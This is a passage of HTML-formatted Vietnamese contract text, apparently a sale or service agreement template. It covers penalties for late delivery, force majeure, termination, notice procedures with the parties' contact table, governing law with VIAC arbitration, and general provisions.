b&#7845;t kh&#7843; kh&#225;ng), th&#236; B&#234;n B&#225;n ph&#7843;i ch&#7883;u ph&#7841;t vi ph&#7841;m t&#237;nh theo l&#227;i su&#7845;t n&#7907; qu&#225; h&#7841;n c&#7911;a Ng&#226;n h&#224;ng c&#244;ng b&#7889;, B&#234;n B&#225;n ph&#7843;i n&#7897;p ph&#7841;t cho B&#234;n Mua v&#7899;i m&#7913;c 0,5% gi&#225; tr&#7883; H&#7907;p &#272;&#7891;ng cho m&#7895;i ng&#224;y ch&#7853;m tr&#7877; nh&#432;ng t&#7893;ng gi&#225; tr&#7883; kho&#7843;n ti&#7873;n ph&#7841;t kh&#244;ng v&#432;&#7907;t qu&#225; 8% gi&#225; tr&#7883; H&#7907;p &#272;&#7891;ng b&#7883; vi ph&#7841;m v&#224; ph&#7843;i b&#7891;i th&#432;&#7901;ng m&#7885;i thi&#7879;t h&#7841;i cho B&#234;n Mua, nh&#432;ng trong m&#7885;i tr&#432;&#7901;ng h&#7907;p, m&#7913;c b&#7891;i th&#432;&#7901;ng kh&#244;ng nhi&#7873;u h&#417;n 12% gi&#225; tr&#7883; h&#7907;p &#273;&#7891;ng.</span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>S&#7920; KI&#7878;N B&#7844;T KH&#7842; KH&#193;NG</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>S&#7921; ki&#7879;n b&#7845;t kh&#7843; kh&#225;ng l&#224; s&#7921; ki&#7879;n x&#7843;y ra m&#7897;t c&#225;ch kh&#225;ch quan, kh&#244;ng th&#7875; l&#432;&#7901;ng tr&#432;&#7899;c v&#224; kh&#244;ng th&#7875; kh&#7855;c ph&#7909;c &#273;&#432;&#7907;c m&#7863;c d&#249; &#273;&#227; &#225;p d&#7909;ng m&#7885;i bi&#7879;n ph&#225;p c&#7847;n thi&#7871;t v&#224; kh&#7843; n&#259;ng cho ph&#233;p (&#8220;S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng&#8221;).</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>M&#7897;t s&#7889; S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng bao g&#7891;m nh&#432;ng kh&#244;ng gi&#7899;i h&#7841;n nh&#432; sau: Th&#7843;m h&#7885;a thi&#234;n nhi&#234;n, d&#7883;ch b&#7879;nh, b&#7845;t &#7893;n ch&#237;nh tr&#7883; (c&#243; tuy&#234;n b&#7889; ho&#7863;c kh&#244;ng tuy&#234;n b&#7889;), &#273;&#236;nh c&#244;ng lao &#273;&#7897;ng, h&#7887;a ho&#7841;n, thay &#273;&#7893;i ph&#225;p lu&#7853;t c&#7911;a nh&#224; n&#432;&#7899;c, m&#7879;nh l&#7879;nh c&#7911;a ch&#237;nh quy&#7873;n, c&#225;c s&#7921; ki&#7879;n kh&#225;c kh&#244;ng do l&#7895;i c&#7911;a B&#234;n n&#224;o m&#7863;c d&#249; &#273;&#227; &#225;p d&#7909;ng m&#7885;i bi&#7879;n ph&#225;p c&#7847;n thi&#7871;t v&#224; kh&#7843; n&#259;ng cho ph&#233;p nh&#432;ng kh&#244;ng th&#7875; kh&#7855;c ph&#7909;c &#273;&#432;&#7907;c ho&#7863;c nh&#7919;ng thay &#273;&#7893;i kh&#225;ch quan kh&#225;c v&#432;&#7907;t ngo&#224;i s&#7921; ki&#7875;m so&#225;t h&#7907;p l&#253; c&#7911;a m&#7897;t/ho&#7863;c C&#225;c B&#234;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Kh&#244;ng B&#234;n n&#224;o ph&#7843;i ch&#7883;u tr&#225;ch nhi&#7879;m hay b&#7891;i th&#432;&#7901;ng thi&#7879;t h&#7841;i n&#7871;u m&#7897;t B&#234;n vi ph&#7841;m H&#7907;p &#272;&#7891;ng n&#224;y do S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng g&#226;y ra d&#249; B&#234;n vi ph&#7841;m &#273;&#243; &#273;&#227; &#225;p d&#7909;ng m&#7885;i bi&#7879;n ph&#225;p c&#7847;n thi&#7871;t v&#224; kh&#7843; n&#259;ng cho ph&#233;p nh&#432;ng v&#7851;n kh&#244;ng kh&#7855;c ph&#7909;c &#273;&#432;&#7907;c &#273;&#7875; c&#243; th&#7875; th&#7921;c hi&#7879;n ngh&#297;a v&#7909; theo H&#7907;p &#272;&#7891;ng n&#224;y.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>M&#7897;t B&#234;n vi ph&#7841;m H&#7907;p &#272;&#7891;ng do S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng ph&#7843;i g&#7917;i th&#244;ng b&#225;o cho B&#234;n c&#242;n l&#7841;i trong v&#242;ng 5 (n&#259;m) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y ph&#225;t sinh S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng c&#243; nguy c&#417; d&#7851;n &#273;&#7871;n vi ph&#7841;m H&#7907;p &#272;&#7891;ng, trong &#273;&#243; n&#234;u r&#245; s&#7921; ki&#7879;n g&#226;y ra vi ph&#7841;m v&#224; c&#225;c bi&#7879;n ph&#225;p m&#224; B&#234;n &#273;&#243; &#273;&#227; &#225;p d&#7909;ng &#273;&#7875; kh&#7855;c ph&#7909;c t&#7889;i &#273;a thi&#7879;t h&#7841;i cho B&#234;n c&#242;n l&#7841;i (&#8220;Th&#244;ng B&#225;o V&#7873; S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng&#8221;).</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Trong tr&#432;&#7901;ng h&#7907;p S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng k&#233;o d&#224;i h&#417;n 30 (ba m&#432;&#417;i) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y m&#7897;t B&#234;n nh&#7853;n &#273;&#432;&#7907;c Th&#244;ng B&#225;o V&#7873; S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng th&#236; C&#225;c B&#234;n sau &#273;&#226;y &#273;&#7891;ng &#253; ch&#7845;m d&#7913;t H&#7907;p &#272;&#7891;ng v&#224; ti&#7871;n h&#224;nh thanh l&#253; H&#7907;p &#272;&#7891;ng n&#224;y trong v&#242;ng 15 (m&#432;&#7901;i l&#259;m) ng&#224;y l&#224;m vi&#7879;c t&#237;nh t&#7915; ng&#224;y h&#7871;t th&#7901;i h&#7841;n 30 (ba m&#432;&#417;i) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y m&#7897;t B&#234;n nh&#7853;n &#273;&#432;&#7907;c Th&#244;ng B&#225;o V&#7873; S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng.</span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>CH&#7844;M D&#7912;T H&#7906;P &#272;&#7890;NG</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong> H&#7907;p &#272;&#7891;ng ch&#7845;m d&#7913;t trong c&#225;c tr&#432;&#7901;ng h&#7907;p sau:</strong></span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Theo th&#7887;a thu&#7853;n c&#7911;a C&#225;c B&#234;n;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Kh&#244;ng &#7843;nh h&#432;&#7903;ng &#273;&#7871;n &#272;i&#7873;u 11.1. (c) v&#224; &#272;i&#7873;u 11.1. (d) d&#432;&#7899;i &#273;&#226;y, m&#7897;t B&#234;n ch&#7845;m d&#7913;t H&#7907;p &#272;&#7891;ng do B&#234;n c&#242;n l&#7841;i vi ph&#7841;m c&#225;c &#273;i&#7873;u kho&#7843;n c&#7911;a H&#7907;p &#272;&#7891;ng m&#224; B&#234;n vi ph&#7841;m &#273;&#227; kh&#244;ng kh&#7855;c ph&#7909;c &#273;&#432;&#7907;c h&#224;nh vi vi ph&#7841;m trong v&#242;ng 5 (n&#259;m) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y B&#234;n b&#7883; vi ph&#7841;m g&#7903;i th&#244;ng b&#225;o v&#7873; h&#224;nh vi vi ph&#7841;m v&#224; y&#234;u c&#7847;u kh&#7855;c ph&#7909;c h&#224;nh vi.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">N&#7871;u H&#7907;p &#272;&#7891;ng b&#7883; ch&#7845;m d&#7913;t theo &#272;i&#7873;u 10.1. (b) n&#224;y, B&#234;n b&#7883; vi ph&#7841;m ph&#7843;i g&#7917;i th&#244;ng b&#225;o ch&#7845;m d&#7913;t H&#7907;p &#272;&#7891;ng b&#7857;ng v&#259;n b&#7843;n &#273;&#7871;n B&#234;n vi ph&#7841;m trong v&#242;ng 7 (b&#7843;y) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y k&#7871;t th&#250;c th&#7901;i h&#7841;n 5 (n&#259;m) ng&#224;y l&#224;m vi&#7879;c, n&#234;u r&#245; h&#224;nh vi vi ph&#7841;m c&#7911;a B&#234;n vi ph&#7841;m. H&#7907;p &#272;&#7891;ng s&#7869; ch&#7845;m d&#7913;t ngay khi B&#234;n vi ph&#7841;m nh&#7853;n &#273;&#432;&#7907;c th&#244;ng b&#225;o ch&#7845;m d&#7913;t c&#7911;a B&#234;n c&#242;n l&#7841;i.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B c&#243; quy&#7873;n, nh&#432;ng kh&#244;ng b&#7855;t bu&#7897;c, &#273;&#417;n ph&#432;&#417;ng ch&#7845;m d&#7913;t H&#7907;p &#272;&#7891;ng sau khi c&#243; th&#244;ng b&#225;o tr&#432;&#7899;c b&#7857;ng v&#259;n b&#7843;n g&#7903;i &#273;&#7871;n B&#234;n A trong th&#7901;i h&#7841;n 15 (m&#432;&#7901;i l&#259;m) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y d&#7921; ki&#7871;n ch&#7845;m d&#7913;t, trong tr&#432;&#7901;ng h&#7907;p B&#234;n A ch&#7853;m thanh to&#225;n ph&#7847;n gi&#225; tr&#7883; C&#244;ng Vi&#7879;c ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh qu&#225; 15 (m&#432;&#7901;i l&#259;m) ng&#224;y l&#224;m vi&#7879;c nh&#432; quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 8.1;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A c&#243; quy&#7873;n, nh&#432;ng kh&#244;ng b&#7855;t bu&#7897;c, &#273;&#417;n ph&#432;&#417;ng ch&#7845;m d&#7913;t H&#7907;p &#272;&#7891;ng sau khi c&#243; th&#244;ng b&#225;o tr&#432;&#7899;c b&#7857;ng v&#259;n b&#7843;n g&#7903;i &#273;&#7871;n B&#234;n B trong th&#7901;i h&#7841;n 15 (m&#432;&#7901;i l&#259;m) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y d&#7921; ki&#7871;n ch&#7845;m d&#7913;t, trong tr&#432;&#7901;ng h&#7907;p B&#234;n B ch&#7853;m ti&#7871;n &#273;&#7897; b&#224;n giao C&#244;ng Vi&#7879;c ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh qu&#225; 15 (m&#432;&#7901;i l&#259;m) ng&#224;y l&#224;m vi&#7879;c nh&#432; quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 8.2;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">X&#7843;y ra S&#7921; Ki&#7879;n B&#7845;t Kh&#7843; Kh&#225;ng quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 10.2 c&#7911;a H&#7907;p &#272;&#7891;ng.</span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Khi H&#7907;p &#272;&#7891;ng b&#7883; ch&#7845;m d&#7913;t theo c&#225;c tr&#432;&#7901;ng h&#7907;p quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 11.1, C&#225;c B&#234;n s&#7869; quy&#7871;t to&#225;n gi&#225; tr&#7883; kh&#7889;i l&#432;&#7907;ng C&#244;ng Vi&#7879;c v&#224;/ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh th&#7921;c t&#7871; m&#224; B&#234;n B &#273;&#227; th&#7921;c hi&#7879;n. Sau khi B&#234;n A ki&#7875;m tra v&#224; ch&#7845;p thu&#7853;n nghi&#7879;m thu C&#244;ng Vi&#7879;c v&#224;/ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh th&#7921;c t&#7871; v&#224; B&#234;n B b&#224;n giao l&#7841;i to&#224;n b&#7897; c&#225;c h&#7841;ng m&#7909;c thu&#7897;c C&#244;ng Vi&#7879;c v&#224;/ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh v&#224; c&#225;c v&#7853;t t&#432;, thi&#7871;t b&#7883; &#273;&#227; &#273;&#432;&#7907;c nghi&#7879;m thu cho B&#234;n A, B&#234;n A s&#7869; thanh to&#225;n s&#7889; ti&#7873;n t&#432;&#417;ng &#7913;ng cho B&#234;n B.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>N&#7871;u H&#7907;p &#272;&#7891;ng b&#7883; ch&#7845;m d&#7913;t theo &#272;i&#7873;u 11.1. (b), B&#234;n vi ph&#7841;m c&#243; tr&#225;ch nhi&#7879;m b&#7891;i th&#432;&#7901;ng thi&#7879;t h&#7841;i cho B&#234;n b&#7883; vi ph&#7841;m li&#234;n quan &#273;&#7871;n h&#224;nh vi vi ph&#7841;m theo quy &#273;&#7883;nh.</span></li>\n</ul>\n</li>\n</ol>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>TH&#212;NG B&#193;O</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>B&#7845;t k&#7923; th&#244;ng b&#225;o, s&#7921; &#273;&#7891;ng &#253; ho&#7863;c th&#244;ng tin li&#234;n l&#7841;c n&#224;o kh&#225;c (&#8220;<strong>Th&#244;ng B&#225;o</strong>&#8221;) &#273;&#432;&#7907;c &#273;&#432;a ra ho&#7863;c th&#7921;c hi&#7879;n theo H&#7907;p &#272;&#7891;ng n&#224;y:</span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">ph&#7843;i &#273;&#432;&#7907;c l&#7853;p th&#224;nh b&#7857;ng v&#259;n b&#7843;n v&#224; k&#253; b&#7903;i ng&#432;&#7901;i &#273;&#432;&#7907;c b&#234;n g&#7917;i &#7911;y quy&#7873;n h&#7907;p l&#7879;;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">ph&#7843;i giao &#273;&#7871;n b&#234;n d&#7921; &#273;&#7883;nh nh&#7853;n b&#7857;ng &#273;&#432;&#7901;ng th&#432; b&#432;u &#273;i&#7879;n b&#7843;o &#273;&#7843;m, tr&#7843; tr&#432;&#7899;c b&#432;u ph&#237; ho&#7863;c &#273;&#432;&#7901;ng th&#432; b&#432;u &#273;i&#7879;n h&#7841;ng nh&#7845;t ho&#7863;c b&#7857;ng d&#7883;ch v&#7909; giao th&#432; c&#243; bi&#234;n nh&#7853;n (v&#237; d&#7909; nh&#432; c&#244;ng ty &#273;&#432;a tin c&#243; giao l&#7841;i bi&#234;n nh&#7853;n c&#243; ch&#7919; k&#253;), b&#7857;ng c&#225;ch ph&#225;t tay, &#273;&#7871;n &#273;&#7883;a ch&#7881; n&#234;u d&#432;&#7899;i &#273;&#226;y (ho&#7863;c &#273;&#7883;a ch&#7881; kh&#225;c m&#224; &#273;&#227; &#273;&#432;&#7907;c b&#234;n d&#7921; &#273;&#7883;nh nh&#7853;n th&#244;ng b&#225;o v&#7899;i b&#234;n g&#7917;i v&#224;o l&#7847;n g&#7847;n nh&#7845;t b&#7857;ng v&#259;n b&#7843;n).</span></li>\n</ol>\n<table width=\"612\">\n<tbody>\n<tr>\n<td colspan=\"2\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>N&#7871;u g&#7917;i &#273;&#7871;n B&#234;n B: </em></strong><strong>&#160;C&#212;NG TY C&#7892; PH&#7846;N C&#212;NG NGH&#7878; HAMILTON AIR</strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Ng&#432;&#7901;i nh&#7853;n:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#212;ng / Mr. H&#7890; V&#258;N C&#212;NG</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>S&#7889; &#273;i&#7879;n tho&#7841;i:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">(+84) 989 343 363</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#7883;a ch&#7881;:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">184 Tr&#7847;n L&#7921;u, KDT An Ph&#250;, Qu&#7853;n 2</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#7883;a ch&#7881; th&#432; &#273;i&#7879;n t&#7917;: </strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">congho@hogiaphat.vn</span></p>\n</td>\n</tr>\n<tr>\n<td colspan=\"2\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>N&#7871;u g&#7917;i &#273;&#7871;n B&#234;n A:</em></strong><strong><em>&#160;&#160; </em></strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Ng&#432;&#7901;i nh&#7853;n:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>S&#7889; &#273;i&#7879;n tho&#7841;i:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#7883;a ch&#7881;:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#7883;a ch&#7881; th&#432; &#273;i&#7879;n t&#7917;:</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Th&#244;ng B&#225;o s&#7869; &#273;&#432;&#7907;c xem l&#224; &#273;&#227; &#273;&#432;&#7907;c &#273;&#432;a ra ho&#7863;c th&#7921;c hi&#7879;n, v&#224; nh&#7853;n h&#7907;p l&#7879;:</span></li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">v&#224;o l&#250;c th&#7921;c giao, trong tr&#432;&#7901;ng h&#7907;p ph&#225;t tay;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">2 (hai) ng&#224;y l&#224;m vi&#7879;c sau ng&#224;y g&#7917;i (n&#7871;u g&#7917;i &#273;&#7871;n &#273;&#7883;a ch&#7881; &#7903; trong c&#249;ng qu&#7889;c gia) ho&#7863;c 5 (n&#259;m) ng&#224;y l&#224;m vi&#7879;c sau ng&#224;y g&#7917;i (n&#7871;u g&#7917;i &#273;&#7871;n &#273;&#7883;a ch&#7881; &#7903; qu&#7889;c gia kh&#225;c), trong tr&#432;&#7901;ng h&#7907;p g&#7917;i b&#7857;ng &#273;&#432;&#7901;ng th&#432; b&#432;u &#273;i&#7879;n ho&#7863;c d&#7883;ch v&#7909; giao th&#432; c&#243; bi&#234;n nh&#7853;n;</span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>C&#225;c B&#234;n &#273;&#7891;ng &#253; r&#7857;ng Th&#244;ng B&#225;o ph&#249; h&#7907;p v&#7899;i quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 12.1. (a) c&#361;ng c&#243; th&#7875; &#273;&#432;&#7907;c l&#7853;p d&#432;&#7899;i d&#7841;ng th&#432; &#273;i&#7879;n t&#7917;. Theo &#273;&#243;, Th&#244;ng B&#225;o &#273;&#432;&#7907;c g&#7903;i d&#432;&#7899;i d&#7841;ng th&#432; &#273;i&#7879;n t&#7917; s&#7869; &#273;&#432;&#7907;c xem l&#224; &#273;&#227; &#273;&#432;a ra v&#224; nh&#7853;n h&#7907;p l&#7879; khi b&#234;n g&#7903;i nh&#7853;n &#273;&#432;&#7907;c ph&#7843;n h&#7891;i b&#7857;ng th&#432; &#273;i&#7879;n t&#7917; t&#7915; b&#234;n nh&#7853;n v&#7873; vi&#7879;c &#273;&#227; nh&#7853;n &#273;&#432;&#7907;c Th&#244;ng B&#225;o. &#272;&#7883;a ch&#7881; th&#432; &#273;i&#7879;n t&#7917; &#273;&#432;&#7907;c quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 12.1 c&#7911;a H&#7907;p &#272;&#7891;ng.</span></li>\n</ul>\n</li>\n</ol>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#160;</strong></span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>LU&#7852;T &#272;I&#7872;U CH&#7880;NH V&#192; GI&#7842;I QUY&#7870;T TRANH CH&#7844;P</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>H&#7907;p &#272;&#7891;ng v&#224; tranh ch&#7845;p ph&#225;t sinh t&#7915; ho&#7863;c li&#234;n quan &#273;&#7871;n H&#7907;p &#272;&#7891;ng n&#224;y, &#273;&#432;&#7907;c &#273;i&#7873;u ch&#7881;nh b&#7903;i ph&#225;p lu&#7853;t n&#432;&#7899;c C&#7897;ng H&#242;a X&#227; h&#7897;i Ch&#7911; ngh&#297;a Vi&#7879;t Nam.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Trong qu&#225; tr&#236;nh th&#7921;c hi&#7879;n H&#7907;p &#272;&#7891;ng, n&#7871;u ph&#225;t sinh m&#226;u thu&#7851;n, c&#225;c b&#234;n s&#7869; th&#432;&#417;ng l&#432;&#7907;ng &#273;&#7875; gi&#7843;i quy&#7871;t b&#7845;t &#273;&#7891;ng tr&#234;n tinh th&#7847;n h&#242;a gi&#7843;i v&#224; h&#7907;p l&#253; v&#7873; m&#7863;t th&#432;&#417;ng m&#7841;i. M&#7897;t b&#234;n c&#243; th&#7875; g&#7917;i m&#7897;t th&#244;ng b&#225;o b&#7857;ng v&#259;n b&#7843;n (&#8220;Th&#244;ng B&#225;o V&#7873; Tranh Ch&#7845;p&#8221;) li&#234;n quan &#273;&#7871;n vi&#7879;c x&#7843;y ra t&#236;nh hu&#7889;ng tranh ch&#7845;p cho b&#234;n c&#242;n l&#7841;i. Trong v&#242;ng 7 (b&#7843;y) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y nh&#7853;n &#273;&#432;&#7907;c Th&#244;ng B&#225;o V&#7873; Tranh Ch&#7845;p, C&#225;c B&#234;n s&#7869; g&#7863;p ho&#7863;c th&#7843;o lu&#7853;n qua &#273;i&#7879;n tho&#7841;i ho&#7863;c h&#7885;p tr&#7921;c tuy&#7871;n v&#224; th&#432;&#417;ng l&#432;&#7907;ng ph&#432;&#417;ng &#225;n gi&#7843;i quy&#7871;t tranh ch&#7845;p tr&#234;n tinh th&#7847;n thi&#7879;n ch&#237;. B&#7845;t k&#7923; ph&#432;&#417;ng &#225;n gi&#7843;i quy&#7871;t n&#224;o &#273;&#432;&#7907;c &#273;&#7891;ng thu&#7853;n b&#7857;ng v&#259;n b&#7843;n c&#243; t&#237;nh r&#224;ng bu&#7897;c v&#7899;i C&#225;c B&#234;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>N&#7871;u C&#225;c B&#234;n kh&#244;ng th&#7875; &#273;&#7841;t &#273;&#432;&#7907;c m&#7897;t ph&#432;&#417;ng &#225;n h&#242;a gi&#7843;i trong v&#242;ng 14 (m&#432;&#7901;i b&#7889;n) ng&#224;y l&#224;m vi&#7879;c k&#7875; t&#7915; ng&#224;y nh&#7853;n &#273;&#432;&#7907;c Th&#244;ng B&#225;o V&#7873; Tranh Ch&#7845;p, b&#7857;ng H&#7907;p &#272;&#7891;ng n&#224;y, C&#225;c B&#234;n &#273;&#7891;ng &#253; &#273;&#432;a m&#7895;i tranh ch&#7845;p ph&#225;t sinh t&#7915;, ho&#7863;c li&#234;n quan &#273;&#7871;n H&#7907;p &#272;&#7891;ng n&#224;y ho&#7863;c quan h&#7879; c&#7911;a c&#225;c b&#234;n ph&#225;t sinh t&#7915; H&#7907;p &#272;&#7891;ng n&#224;y m&#224; kh&#244;ng th&#7875; gi&#7843;i quy&#7871;t b&#7857;ng vi&#7879;c th&#7887;a thu&#7853;n ho&#7863;c th&#432;&#417;ng l&#432;&#7907;ng tr&#234;n c&#417; s&#7903; thi&#7879;n ch&#237;, &#273;&#7875; gi&#7843;i quy&#7871;t th&#244;ng qua Trung T&#226;m Tr&#7885;ng T&#224;i Qu&#7889;c T&#7871; Vi&#7879;t Nam b&#234;n c&#7841;nh Ph&#242;ng Th&#432;&#417;ng M&#7841;i v&#224; C&#244;ng Nghi&#7879;p Vi&#7879;t Nam (&#8220;VIAC&#8221;) theo Quy T&#7855;c T&#7889; T&#7909;ng Tr&#7885;ng T&#224;i c&#7911;a VIAC. H&#7897;i &#273;&#7891;ng tr&#7885;ng t&#224;i s&#7869; bao g&#7891;m 3 (ba) tr&#7885;ng t&#224;i vi&#234;n. M&#7895;i B&#234;n s&#7869; ch&#7881; &#273;&#7883;nh 1 (m&#7897;t) tr&#7885;ng t&#224;i vi&#234;n, v&#224; 2 (hai) tr&#7885;ng t&#224;i vi&#234;n &#273;&#227; &#273;&#432;&#7907;c C&#225;c B&#234;n ch&#7885;n s&#7869; ch&#7885;n tr&#7885;ng t&#224;i vi&#234;n th&#7913; ba &#273;&#7875; l&#224;m ch&#7911; t&#7883;ch h&#7897;i &#273;&#7891;ng tr&#7885;ng t&#224;i. Ng&#244;n ng&#7919; &#273;&#432;&#7907;c s&#7917; d&#7909;ng trong t&#7889; t&#7909;ng tr&#7885;ng t&#224;i l&#224; ti&#7871;ng Vi&#7879;t. T&#7889; t&#7909;ng tr&#7885;ng t&#224;i s&#7869; &#273;&#432;&#7907;c th&#7921;c hi&#7879;n t&#7841;i Th&#224;nh ph&#7889; H&#7891; Ch&#237; Minh, Vi&#7879;t Nam. Quy&#7871;t &#273;&#7883;nh c&#7911;a tr&#7885;ng t&#224;i l&#224; ph&#225;n quy&#7871;t cu&#7889;i c&#249;ng v&#224; c&#243; t&#237;nh r&#224;ng bu&#7897;c v&#7899;i C&#225;c B&#234;n.</span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>QUY &#272;&#7882;NH CHUNG</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>H&#7907;p &#272;&#7891;ng n&#224;y c&#243; hi&#7879;u l&#7921;c k&#7875; t&#7915; ng&#224;y k&#253;.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>H&#7907;p &#272;&#7891;ng t&#7921; &#273;&#7897;ng &#273;&#432;&#7907;c thanh l&#253; khi C&#225;c B&#234;n &#273;&#227; ho&#224;n t&#7845;t&#160;c&#225;c quy&#7873;n v&#224; ngh&#297;a v&#7909; theo H&#7907;p &#272;&#7891;ng n&#224;y.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>M&#7885;i s&#7917;a &#273;&#7893;i, b&#7893; sung H&#7907;p &#272;&#7891;ng n&#224;y ch&#7881; c&#243; hi&#7879;u l&#7921;c &#273;&#7889;i v&#7899;i C&#225;c B&#234;n khi &#273;&#432;&#7907;c th&#7887;a thu&#7853;n v&#224; k&#253; k&#7871;t h&#7907;p l&#7879; b&#7857;ng v&#259;n b&#7843;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>H&#7907;p &#272;&#7891;ng n&#224;y &#273;&#432;&#7907;c l&#7853;p th&#224;nh 4 (b&#7889;n) b&#7843;n. B&#234;n B&#225;n gi&#7919; 2 (hai) b&#7843;n, b&#234;n Mua gi&#7919; 02 (hai) b&#7843;n c&#243; gi&#225; tr&#7883; ph&#225;p l&#253; nh&#432; 